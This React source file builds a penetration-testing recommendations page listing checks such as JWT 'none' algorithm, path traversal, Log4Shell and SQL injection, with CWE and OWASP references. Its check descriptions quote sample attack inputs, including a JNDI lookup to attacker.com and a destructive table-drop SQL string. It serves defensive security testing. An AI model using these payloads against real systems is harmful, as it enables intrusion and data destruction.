import { SetStateAction, useEffect, useState } from "react";
import {
  Accordion,
  AccordionActions,
  AccordionDetails,
  AccordionSummary,
  Box,
  Button,
  Card,
  CardContent,
  Chip,
  FormControl,
  Grid,
  InputLabel,
  MenuItem,
  Select,
  SelectChangeEvent,
  Tab,
  Tabs,
  Typography,
} from "@mui/material";
import Layout from "../../app/layout/Layout";
import { Site } from "../../app/models/site";
import agent from "../../app/api/agent";
import LoadingComponent from "../../app/layout/LoadingComponent";
import dayjs, { Dayjs } from "dayjs";
import { LocalizationProvider } from "@mui/x-date-pickers";
import { AdapterDayjs } from "@mui/x-date-pickers/AdapterDayjs";
import { DateTimePicker } from "@mui/x-date-pickers/DateTimePicker";
import { useOrganization } from "@clerk/clerk-react";
import ExpandMoreIcon from "@mui/icons-material/ExpandMore";
import ClearOutlinedIcon from "@mui/icons-material/ClearOutlined";
import CheckOutlinedIcon from "@mui/icons-material/CheckOutlined";

import {
  EuiEmptyPrompt,
  EuiLink,
  EuiSelect,
  EuiSpacer,
  EuiSuperDatePicker,
  EuiSuperDatePickerProps,
  EuiTitle,
  OnRefreshProps,
  OnTimeChangeProps,
} from "@elastic/eui";
import { EuiPageHeader, EuiButton } from "@elastic/eui";
import { Add, PlayArrow } from "@mui/icons-material";
import { Link } from "react-router-dom";
import { useFlow } from "@frigade/react";
import HelpOutlineOutlinedIcon from "@mui/icons-material/HelpOutlineOutlined";
import { PIECheck } from "../../app/models/piecheck";
import { toast } from "react-toastify";
import { TabContext, TabList, TabPanel } from "@mui/lab";
import LinearProgressWithLabel from "../../app/layout/LinearProgressWithLabel";

export default function Pie() {
  const [selectedOption, setSelectedOption] = useState("");
  const [loading, setLoading] = useState(true);
  const [sites, setSites] = useState<Site[]>([]);
  const { organization } = useOrganization();

  const handleOptionChange = (event: any) => {
    setSelectedOption(event.target.value);
  };

  const [recentlyUsedRanges, setRecentlyUsedRanges] = useState<
    NonNullable<EuiSuperDatePickerProps["recentlyUsedRanges"]>
  >([]);

  const [isLoading, setIsLoading] = useState(false);

  const [start, setStart] = useState("now-12h");
  const [end, setEnd] = useState("now");

  const [refreshKey, setRefreshKey] = useState(Date.now());

  const onTimeChange = ({ start, end }: OnTimeChangeProps) => {
    const recentlyUsedRange = recentlyUsedRanges.filter((recentlyUsedRange) => {
      const isDuplicate =
        recentlyUsedRange.start === start && recentlyUsedRange.end === end;
      return !isDuplicate;
    });
    recentlyUsedRange.unshift({ start, end });
    setStart(start);
    setEnd(end);
    setRecentlyUsedRanges(
      recentlyUsedRange.length > 10
        ? recentlyUsedRange.slice(0, 9)
        : recentlyUsedRange
    );
    setIsLoading(true);
    startLoading();
  };

  const onRefresh = ({ start, end }: OnRefreshProps) => {
    setRefreshKey(Date.now()); // force a re-render
    setIsLoading(true);
    startLoading();
  };

  const startLoading = () => {
    setTimeout(stopLoading, 1000);
  };

  const stopLoading = () => {
    setIsLoading(false);
  };

  const [running, setRunning] = useState<Record<string, boolean>>({});

  const handleRunCheck = async (
    id: string,
    url: string,
    gte: string,
    lte: string
  ) => {
    try {
      setRunning((r) => ({ ...r, [id]: true }));
      // Call your API: must return boolean (true/false)
      const result: boolean = await agent.PIE.runCheck({ id, url, gte, lte });

      // Write result onto the specific check
      setCheckList((prev) =>
        prev.map((c) => (c.id === id ? { ...c, result } : c))
      );

      // Show toast notification based on result
      if (result) {
        toast.success("Check passed successfully!");
      } else {
        toast.error("Check failed.");
      }
    } catch (err) {
      console.error("Run check failed", err);
      toast.error("An error occurred while running the check.");
    } finally {
      setRunning((r) => ({ ...r, [id]: false }));
    }
  };
  const { flow } = useFlow("flow_6fi97SYs");

  useEffect(() => {
    setLoading(true);
    agent.Catalog.list()
      .then((sites) => {
        setSites(sites);
        if (sites.length > 0) {
          flow?.steps.get("step-5")?.complete();
        }
      })
      .catch((error) => console.log(error))
      .finally(() => setLoading(false));
  }, [organization?.id, flow]);

  const siteArray = sites.map((site) => site.hackgatedName);

  const [agreedChecks, setAgreedChecks] = useState<string[]>([]);

  const handleAgree = (id: string) => {
    setAgreedChecks((prev) => (prev.includes(id) ? prev : [...prev, id]));
    toast.success("Check has been accepted successfully!");
  };

  const checks: PIECheck[] = [
    {
      id: "PIE-0038",
      name: "Test DELETE HTTP Method",
      description:
        "The DELETE HTTP method is used to remove resources from a server.\nIf it is enabled without proper authentication and authorization, attackers could delete data they should not have access to.\nIt is often overlooked by developers, leaving dangerous endpoints exposed even if the UI hides delete options.\nAttackers can exploit it directly through crafted requests, bypassing normal application flows.\nTesting it ensures that destructive actions are properly secured and only available to authorized users.",
      cwe: [
        "CWE-285: Improper Authorization",
        "CWE-863: Incorrect Authorization",
      ],
      owasp: ["API5:2019 - Broken Function Level Authorization"],
      capec: ["CAPEC-139: Forced Browsing"],
      references: [
        "https://owasp.org/API-Security/editions/2019/en/0xa5-broken-function-level-authorization/",
        "https://portswigger.net/web-security/access-control",
      ],
      type: "static",
    },
    {
      id: "PIE-0116",
      name: "PHP Serialized Object Injection",
      description:
        "PHP Serialized Object Injection is a vulnerability that occurs when a web application unserializes untrusted user input.\nAttackers can supply a specially crafted serialized object that, when processed, can trigger unexpected behavior in the application.\nIf the application’s code or included libraries contain “magic methods” like __wakeup() or __destruct() with insecure logic, these can be abused for actions such as file deletion, code execution, or data manipulation.\nThis flaw often appears in features that store or transfer complex data structures between requests without proper validation.\nTesting involves identifying unserialize() usage with user-controlled data and determining whether dangerous classes or gadgets are available for exploitation.",
      cwe: ["CWE-502: Deserialization of Untrusted Data"],
      owasp: ["A08:2021 - Software and Data Integrity Failures"],
      capec: ["CAPEC-586: Object Injection"],
      references: [
        "https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection",
        "https://portswigger.net/web-security/deserialization",
      ],
      type: "dynamic",
    },
    {
      id: "PIE-0215",
      name: "Test JWT token for null algorithm",
      description:
        'Testing a JWT token for the null algorithm checks whether the application improperly accepts unsigned tokens.\nInsecure implementations might accept a token with "alg": "none" in the header, meaning no signature verification is performed.\nIf exploited, an attacker could forge or modify a token’s payload (e.g., change their role to admin) and gain unauthorized access.\nThis vulnerability often appears when JWT libraries are misconfigured or developers explicitly allow the none algorithm for debugging.\nTesting involves crafting a JWT with "alg": "none" and no signature to see if the application still treats it as valid.',
      cwe: ["CWE-287: Improper Authentication"],
      owasp: ["A07:2021 - Identification and Authentication Failures"],
      capec: ["CAPEC-115: Authentication Bypass"],
      references: [
        "https://owasp.org/www-community/vulnerabilities/JSON_Web_Token_(JWT)_none_algorithm_vulnerability",
        "https://portswigger.net/web-security/jwt",
      ],
      type: "manual",
    },
    {
      id: "PIE-0051",
      name: "Try Path traversal attack",
      description:
        "A path traversal attack tries to access files or directories outside the intended folder by manipulating user-supplied file paths.\nAttackers use sequences like ../ or URL-encoded variants to “climb” up the directory tree.\nIf the application does not sanitize or validate the input, this can expose sensitive files such as /etc/passwd or configuration files.\nIt can also be combined with other flaws to retrieve source code, credentials, or logs.\nTesting involves providing crafted file path inputs and observing if the server returns restricted or unexpected files.",
      cwe: ["CWE-22: Path Traversal"],
      owasp: ["A05:2021 - Security Misconfiguration"],
      capec: ["CAPEC-126: Path Traversal"],
      references: [
        "https://owasp.org/www-community/attacks/Path_Traversal",
        "https://portswigger.net/web-security/file-path-traversal",
      ],
      type: "static",
    },
    {
      id: "PIE-0303",
      name: "Test for Log4Shell vulnerabilities",
      description:
        "Testing for the Log4Shell vulnerability involves checking if a system using Log4j (versions ≤ 2.14.1) processes attacker-controlled input in a way that triggers JNDI lookups.\nThe flaw allows payloads like ${jndi:ldap://attacker.com/a} to be evaluated, potentially leading to remote code execution.\nIt can be triggered via HTTP headers, form fields, or any loggable input field, depending on the application’s logging behavior.\nA safe test should use a non-malicious callback endpoint (e.g., Burp Collaborator or Canarytokens) to detect if an outbound request is made instead of delivering a real exploit.\nIf the test input causes the server to attempt a lookup to your controlled endpoint, the application is likely vulnerable and requires immediate patching or mitigation.",
      cwe: [
        "CWE-20: Improper Input Validation",
        "CWE-502: Deserialization of Untrusted Data",
      ],
      owasp: ["A08:2021 - Software and Data Integrity Failures"],
      capec: ["CAPEC-248: Command Injection"],
      references: [
        "https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/",
        "https://portswigger.net/daily-swig/log4shell-everything-you-need-to-know",
      ],
      type: "static",
    },
    {
      id: "PIE-0144",
      name: "Test for /admin path",
      description:
        "Testing for the /admin path involves checking whether an administrative interface exists and is accessible without proper authentication.\nAttackers often try common paths like /admin, /administrator, or /admin/login to find hidden admin panels.\nIf exposed, these interfaces can reveal sensitive data or provide direct control over the application.\nTesting includes sending requests to these paths, observing HTTP status codes, and checking for redirects or login requirements.\nA secure system should return a 403/404 or redirect to a login page, ensuring only authorized users can access it.",
      cwe: ["CWE-285: Improper Authorization"],
      owasp: ["A01:2021 - Broken Access Control"],
      capec: ["CAPEC-169: Footprinting"],
      references: [
        "https://owasp.org/Top10/A01_2021-Broken_Access_Control/",
        "https://portswigger.net/web-security/access-control",
      ],
      type: "static",
    },
    {
      id: "PIE-0172",
      name: "Test for .git file",
      description:
        "Testing for a .git file involves checking if the application’s .git directory is publicly accessible.\nIf exposed, attackers can download repository files and reconstruct the source code, revealing secrets, credentials, and internal logic.\nA common test is to request .git/config or .git/HEAD and see if the server returns valid Git metadata.\nThis issue often happens when developers deploy code directly from a local repository without excluding .git from the public root.\nA secure setup should block access to .git directories entirely at the web server level.",
      cwe: ["CWE-538: File and Directory Information Exposure"],
      owasp: ["A05:2021 - Security Misconfiguration"],
      capec: ["CAPEC-118: Sniffing Attacks"],
      references: [
        "https://owasp.org/www-community/attacks/Source_code_disclosure",
        "https://portswigger.net/kb/issues/00500300_git-metadata-information-disclosure",
      ],
      type: "static",
    },
    {
      id: "PIE-0197",
      name: "Test for SQL injections",
      description:
        "Testing for SQL injection involves checking whether user input is passed into a database query without proper sanitization or parameterization.\nAttackers can inject SQL syntax, such as ' OR '1'='1 or '; DROP TABLE users;--, to manipulate queries and access unauthorized data.\nTesting often starts with simple payloads in parameters, form fields, or headers to observe abnormal responses, errors, or data leaks.\nA safe approach uses boolean-based, error-based, or time-based techniques without causing destructive actions.\nA secure application should use prepared statements, stored procedures, and proper input validation to prevent SQL injection.",
      cwe: ["CWE-89: SQL Injection"],
      owasp: ["A03:2021 - Injection"],
      capec: ["CAPEC-66: SQL Injection"],
      references: [
        "https://owasp.org/Top10/A03_2021-Injection/",
        "https://portswigger.net/web-security/sql-injection",
      ],
      type: "static",
    },
  ];

  const [checkList, setCheckList] = useState<PIECheck[]>([
    {
      id: "PIE-0038",
      name: "Test DELETE HTTP Method",
      description:
        "The DELETE HTTP method is used to remove resources from a server.\nIf it is enabled without proper authentication and authorization, attackers could delete data they should not have access to.\nIt is often overlooked by developers, leaving dangerous endpoints exposed even if the UI hides delete options.\nAttackers can exploit it directly through crafted requests, bypassing normal application flows.\nTesting it ensures that destructive actions are properly secured and only available to authorized users.",
      cwe: [
        "CWE-285: Improper Authorization",
        "CWE-863: Incorrect Authorization",
      ],
      owasp: ["API5:2019 - Broken Function Level Authorization"],
      capec: ["CAPEC-139: Forced Browsing"],
      references: [
        "https://owasp.org/API-Security/editions/2019/en/0xa5-broken-function-level-authorization/",
        "https://portswigger.net/web-security/access-control",
      ],
      type: "static",
    },
    {
      id: "PIE-0116",
      name: "PHP Serialized Object Injection",
      description:
        "PHP Serialized Object Injection is a vulnerability that occurs when a web application unserializes untrusted user input.\nAttackers can supply a specially crafted serialized object that, when processed, can trigger unexpected behavior in the application.\nIf the application’s code or included libraries contain “magic methods” like __wakeup() or __destruct() with insecure logic, these can be abused for actions such as file deletion, code execution, or data manipulation.\nThis flaw often appears in features that store or transfer complex data structures between requests without proper validation.\nTesting involves identifying unserialize() usage with user-controlled data and determining whether dangerous classes or gadgets are available for exploitation.",
      cwe: ["CWE-502: Deserialization of Untrusted Data"],
      owasp: ["A08:2021 - Software and Data Integrity Failures"],
      capec: ["CAPEC-586: Object Injection"],
      references: [
        "https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection",
        "https://portswigger.net/web-security/deserialization",
      ],
      type: "dynamic",
    },
    {
      id: "PIE-0215",
      name: "Test JWT token for null algorithm",
      description:
        'Testing a JWT token for the null algorithm checks whether the application improperly accepts unsigned tokens.\nInsecure implementations might accept a token with "alg": "none" in the header, meaning no signature verification is performed.\nIf exploited, an attacker could forge or modify a token’s payload (e.g., change their role to admin) and gain unauthorized access.\nThis vulnerability often appears when JWT libraries are misconfigured or developers explicitly allow the none algorithm for debugging.\nTesting involves crafting a JWT with "alg": "none" and no signature to see if the application still treats it as valid.',
      cwe: ["CWE-287: Improper Authentication"],
      owasp: ["A07:2021 - Identification and Authentication Failures"],
      capec: ["CAPEC-115: Authentication Bypass"],
      references: [
        "https://owasp.org/www-community/vulnerabilities/JSON_Web_Token_(JWT)_none_algorithm_vulnerability",
        "https://portswigger.net/web-security/jwt",
      ],
      type: "manual",
    },
    {
      id: "PIE-0051",
      name: "Try Path traversal attack",
      description:
        "A path traversal attack tries to access files or directories outside the intended folder by manipulating user-supplied file paths.\nAttackers use sequences like ../ or URL-encoded variants to “climb” up the directory tree.\nIf the application does not sanitize or validate the input, this can expose sensitive files such as /etc/passwd or configuration files.\nIt can also be combined with other flaws to retrieve source code, credentials, or logs.\nTesting involves providing crafted file path inputs and observing if the server returns restricted or unexpected files.",
      cwe: ["CWE-22: Path Traversal"],
      owasp: ["A05:2021 - Security Misconfiguration"],
      capec: ["CAPEC-126: Path Traversal"],
      references: [
        "https://owasp.org/www-community/attacks/Path_Traversal",
        "https://portswigger.net/web-security/file-path-traversal",
      ],
      type: "static",
    },
    {
      id: "PIE-0303",
      name: "Test for Log4Shell vulnerabilities",
      description:
        "Testing for the Log4Shell vulnerability involves checking if a system using Log4j (versions ≤ 2.14.1) processes attacker-controlled input in a way that triggers JNDI lookups.\nThe flaw allows payloads like ${jndi:ldap://attacker.com/a} to be evaluated, potentially leading to remote code execution.\nIt can be triggered via HTTP headers, form fields, or any loggable input field, depending on the application’s logging behavior.\nA safe test should use a non-malicious callback endpoint (e.g., Burp Collaborator or Canarytokens) to detect if an outbound request is made instead of delivering a real exploit.\nIf the test input causes the server to attempt a lookup to your controlled endpoint, the application is likely vulnerable and requires immediate patching or mitigation.",
      cwe: [
        "CWE-20: Improper Input Validation",
        "CWE-502: Deserialization of Untrusted Data",
      ],
      owasp: ["A08:2021 - Software and Data Integrity Failures"],
      capec: ["CAPEC-248: Command Injection"],
      references: [
        "https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/",
        "https://portswigger.net/daily-swig/log4shell-everything-you-need-to-know",
      ],
      type: "static",
    },
    {
      id: "PIE-0144",
      name: "Test for /admin path",
      description:
        "Testing for the /admin path involves checking whether an administrative interface exists and is accessible without proper authentication.\nAttackers often try common paths like /admin, /administrator, or /admin/login to find hidden admin panels.\nIf exposed, these interfaces can reveal sensitive data or provide direct control over the application.\nTesting includes sending requests to these paths, observing HTTP status codes, and checking for redirects or login requirements.\nA secure system should return a 403/404 or redirect to a login page, ensuring only authorized users can access it.",
      cwe: ["CWE-285: Improper Authorization"],
      owasp: ["A01:2021 - Broken Access Control"],
      capec: ["CAPEC-169: Footprinting"],
      references: [
        "https://owasp.org/Top10/A01_2021-Broken_Access_Control/",
        "https://portswigger.net/web-security/access-control",
      ],
      type: "static",
    },
    {
      id: "PIE-0172",
      name: "Test for .git file",
      description:
        "Testing for a .git file involves checking if the application’s .git directory is publicly accessible.\nIf exposed, attackers can download repository files and reconstruct the source code, revealing secrets, credentials, and internal logic.\nA common test is to request .git/config or .git/HEAD and see if the server returns valid Git metadata.\nThis issue often happens when developers deploy code directly from a local repository without excluding .git from the public root.\nA secure setup should block access to .git directories entirely at the web server level.",
      cwe: ["CWE-538: File and Directory Information Exposure"],
      owasp: ["A05:2021 - Security Misconfiguration"],
      capec: ["CAPEC-118: Sniffing Attacks"],
      references: [
        "https://owasp.org/www-community/attacks/Source_code_disclosure",
        "https://portswigger.net/kb/issues/00500300_git-metadata-information-disclosure",
      ],
      type: "static",
    },
    {
      id: "PIE-0197",
      name: "Test for SQL injections",
      description:
        "Testing for SQL injection involves checking whether user input is passed into a database query without proper sanitization or parameterization.\nAttackers can inject SQL syntax, such as ' OR '1'='1 or '; DROP TABLE users;--, to manipulate queries and access unauthorized data.\nTesting often starts with simple payloads in parameters, form fields, or headers to observe abnormal responses, errors, or data leaks.\nA safe approach uses boolean-based, error-based, or time-based techniques without causing destructive actions.\nA secure application should use prepared statements, stored procedures, and proper input validation to prevent SQL injection.",
      cwe: ["CWE-89: SQL Injection"],
      owasp: ["A03:2021 - Injection"],
      capec: ["CAPEC-66: SQL Injection"],
      references: [
        "https://owasp.org/Top10/A03_2021-Injection/",
        "https://portswigger.net/web-security/sql-injection",
      ],
      type: "static",
    },
  ]);

  // Function to remove a check from the list
  const handleDismiss = (id: string) => {
    setCheckList((prev) => prev.filter((check) => check.id !== id));
    toast.success("Check has been dismissed successfully!");
  };

  const [tabValue, settabValue] = useState("1");

  const handleTabChange = (event: React.SyntheticEvent, newValue: string) => {
    settabValue(newValue);
  };

  const [ruleset, setRuleset] = useState("1");

  const handleRulesetChange = (event: SelectChangeEvent) => {
    setRuleset(event.target.value as string);
    toast.success("Ruleset has been changed successfully!");
  };

  const handleManualConfirm = (id: string) => {
    setCheckList((prev) =>
      prev.map((c) => (c.id === id ? { ...c, result: true } : c))
    );
    toast.success("Marked as tested. Check passed!");
  };

  // Calculate percentage of successful checks
  const successCount = checkList.filter((c) => c.result === true).length;
  const percentage =
    checkList.length > 0
      ? Math.round((successCount / checkList.length) * 100)
      : 0;

  if (loading) return <LoadingComponent message="Loading website data..." />;

  if (sites.length === 0)
    return (
      <Layout>
        <EuiPageHeader
          pageTitle="Pentest Insight Engine (PIE)"
          // iconType="logoKibana"
          description="Provides real-time recommendations to improve tester skills, boost efficiency, and strengthen the overall quality of security assessments."
          // rightSideItems={[
          //   <EuiButton fill>Add something</EuiButton>,
          //   <EuiButton>Do something</EuiButton>,
          // ]}
          paddingSize="none"
        />
        <EuiSpacer />

        <Card variant="outlined" sx={{ mb: 2, borderRadius: "12px" }}>
          <CardContent>
            <Box
              sx={{
                height: 400,
                width: "100%",
                display: "flex",
                flexDirection: "column",
                alignItems: "center",
                justifyContent: "center",
              }}
            >
              <EuiEmptyPrompt
                actions={[
                  <EuiButton color="primary" fill>
                    Add a website
                  </EuiButton>,
                ]}
                body={<p>Add a new case or change your filter settings.</p>}
                color="subdued"
                // iconType="logoSecurity"
                layout="vertical"
                title={<h2>Start adding websites</h2>}
                titleSize="m"
              />
            </Box>
          </CardContent>
        </Card>
      </Layout>
    );

  return (
    <Layout>
      <EuiPageHeader
        pageTitle="Pentest Insight Engine (PIE)"
        // iconType="logoKibana"
        description="Provides real-time recommendations to improve tester skills, boost efficiency, and strengthen the overall quality of security assessments."
        // rightSideItems={[
        //   <EuiButton fill>Add something</EuiButton>,
        //   <EuiButton>Do something</EuiButton>,
        // ]}
        paddingSize="none"
      />
      <EuiSpacer />

      {/* <EuiSelect
        options={siteArray.map((hackgatedName, index) => ({ value: hackgatedName, text: hackgatedName }))}
        onChange={(e) => {
          // Handle the select change event
          console.log('Selected value:', e.target.value);
        }}
      /> */}

      <Grid container alignItems="center" spacing={3} mb={3}>
        <Grid item xs={4}>
          <FormControl fullWidth size="small">
            <InputLabel id="site-select-label">Select a site</InputLabel>
            <Select
              labelId="site-select-label"
              id="site-select"
              value={selectedOption}
              label="Select a site"
              onChange={handleOptionChange}
              sx={{ borderRadius: "8px" }}
            >
              {sites.map((sites) => (
                <MenuItem key={sites.hackgatedName} value={sites.hackgatedName}>
                  {sites.hackgatedName}
                </MenuItem>
              ))}
            </Select>
          </FormControl>
        </Grid>
        <Grid item xs={8}>
          <EuiSuperDatePicker
            onTimeChange={onTimeChange}
            start={start}
            onRefresh={onRefresh}
            end={end}
          />
        </Grid>
      </Grid>

      <>
        {selectedOption === "" ? (
          <Box
            sx={{
              height: 400,
              width: "100%",
              display: "flex",
              flexDirection: "column",
              alignItems: "center",
              justifyContent: "center",
            }}
          >
            <EuiEmptyPrompt
              // iconType="logoSecurity"
              title={<h2>Select a website</h2>}
              body={
                <p>
                  Select or add a new website or change your filter settings.
                </p>
              }
              actions={
                <Button
                  component={Link}
                  to="/catalog/add-site"
                  variant="contained"
                  startIcon={<Add />}
                >
                  Add a website
                </Button>
              }
              footer={
                <>
                  <EuiTitle size="xxs">
                    <h3>Want to learn more?</h3>
                  </EuiTitle>
                  <EuiLink
                    href="https://www.hackgate.io/how-does-hackgate-work"
                    target="_blank"
                  >
                    Read the docs
                  </EuiLink>
                </>
              }
            />
          </Box>
        ) : (
          ""
        )}

        {selectedOption !== "" ? (
          <Grid container>
            <Box sx={{ width: "100%", typography: "body1" }}>
              <TabContext value={tabValue}>
                <Box sx={{ borderBottom: 1, borderColor: "divider" }}>
                  <TabList
                    onChange={handleTabChange}
                    aria-label="lab API tabs example"
                  >
                    <Tab label="Recommendations" value="1" />
                    <Tab label="Rulesets" value="2" />
                    <Tab label="Settings" value="3" />
                  </TabList>
                </Box>
                <TabPanel value="1">
                  <Typography variant="h6" mb={2}>
                    Recommendations
                  </Typography>
                  <Grid
                    container
                    alignItems="center"
                    spacing={2}
                  >
                    <Grid item xs>
                      <LinearProgressWithLabel value={percentage} />
                    </Grid>
                    <Grid item>
                      <Button variant="outlined" disabled>Generate Report (PDF)</Button>
                    </Grid>
                  </Grid>

                  <EuiSpacer />

                  {checkList.map((check) => (
                    <Accordion>
                      <AccordionSummary
                        expandIcon={<ExpandMoreIcon />}
                        aria-controls="panel1-content"
                        id="panel1-header"
                      >
                        <Typography component="span">
                          <Chip label={check.id} />
                          {check.name}
                          {check.result === true ? (
                            <CheckOutlinedIcon color="success" />
                          ) : (
                            <></>
                          )}
                        </Typography>
                      </AccordionSummary>
                      <AccordionDetails>
                        <Typography mb={2}>{check.description}</Typography>
                        <Typography mb={2}>CWE: {check.cwe}</Typography>
                        <Typography mb={2}>OWASP ID: {check.owasp}</Typography>
                        <Typography mb={2}>CAPEC: {check.capec}</Typography>
                        <Typography mb={2}>
                          References: <br></br>
                          {check.references.map((reference) => (
                            <>
                              <EuiLink href={reference} target="_blank">
                                {reference}
                              </EuiLink>
                              <br></br>
                            </>
                          ))}
                        </Typography>
                        {check.type == "manual" ? (
                          <Typography>
                            <Chip label="Manual check" variant="outlined" />
                          </Typography>
                        ) : (
                          <></>
                        )}
                      </AccordionDetails>
                      <AccordionActions>
                        {!agreedChecks.includes(check.id) ? (
                          <>
                            <Button
                              color="error"
                              startIcon={<ClearOutlinedIcon />}
                              onClick={() => handleDismiss(check.id)}
                            >
                              Dismiss
                            </Button>
                            <Button
                              color="success"
                              startIcon={<CheckOutlinedIcon />}
                              onClick={() => handleAgree(check.id)}
                            >
                              Agree
                            </Button>
                          </>
                        ) : (
                          <>
                            {check.result === true ? (
                              <Typography
                                color="success.main"
                                sx={{ fontWeight: 500 }}
                              >
                                Success
                              </Typography>
                            ) : check.type === "manual" ? (
                              <Button
                                variant="contained"
                                color="primary"
                                onClick={() => handleManualConfirm(check.id)}
                              >
                                I tested it
                              </Button>
                            ) : (
                              <Button
                                variant="contained"
                                color="primary"
                                startIcon={<PlayArrow />}
                                disabled={!!running[check.id]}
                                onClick={() =>
                                  handleRunCheck(
                                    check.id,
                                    sites.find(
                                      (s) => s.hackgatedName === selectedOption
                                    )?.hackgatedName ?? "",
                                    start,
                                    end
                                  )
                                }
                              >
                                {running[check.id] ? "Running..." : "Run check"}
                              </Button>
                            )}
                          </>
                        )}
                      </AccordionActions>
                    </Accordion>
                  ))}
                </TabPanel>
                <TabPanel value="2">
                  <Typography variant="h6" mb={2} mt={3}>
                    Ruleset
                  </Typography>

                  {checks.map((check) => (
                    <Accordion defaultExpanded>
                      <AccordionSummary
                        expandIcon={<ExpandMoreIcon />}
                        aria-controls="panel1-content"
                        id="panel1-header"
                      >
                        <Typography component="span">
                          <Chip label={check.id} />
                          {check.name}
                        </Typography>
                      </AccordionSummary>
                      <AccordionDetails>{check.description}</AccordionDetails>
                      <AccordionActions>
                        <Button>Disable</Button>
                        <Button>Enable</Button>
                      </AccordionActions>
                    </Accordion>
                  ))}
                </TabPanel>
                <TabPanel value="3">
                  <FormControl fullWidth>
                    <InputLabel id="ruleset-select-label">Ruleset</InputLabel>
                    <Select
                      labelId="ruleset-select-label"
                      id="ruleset-select"
                      label="Ruleset"
                      value={ruleset}
                      onChange={handleRulesetChange}
                    >
                      <MenuItem value={1}>HackGATE Default ruleset</MenuItem>
                      <MenuItem value={2}>OWASP WSTG ruleset</MenuItem>
                      <MenuItem value={3}>OWASP TOP-10 ruleset</MenuItem>
                    </Select>
                  </FormControl>
                </TabPanel>
              </TabContext>
            </Box>
          </Grid>
        ) : (
          ""
        )}
      </>
    </Layout>
  );
}
